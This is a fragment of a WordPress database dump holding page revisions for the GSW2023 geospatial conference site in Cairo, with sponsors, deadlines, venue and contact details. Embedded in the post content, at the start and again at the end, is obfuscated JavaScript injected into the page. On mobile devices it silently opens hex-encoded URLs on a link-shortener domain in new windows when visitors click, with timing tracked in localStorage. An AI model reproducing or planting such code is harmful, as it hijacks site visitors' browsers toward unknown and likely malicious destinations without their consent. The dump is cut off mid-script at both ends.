_0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 02:47:56','2023-04-02 02:47:56','',3066,'https://gsw2023.com/?p=4004',0,'revision','',0),
(4005,1,'2023-04-02 02:48:30','2023-04-02 02:48:30','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403705509{margin-top: 135px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec